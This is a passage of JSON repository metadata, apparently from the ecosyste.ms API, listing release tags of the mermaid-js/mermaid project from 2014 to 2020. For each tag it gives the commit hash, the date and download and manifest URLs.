ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-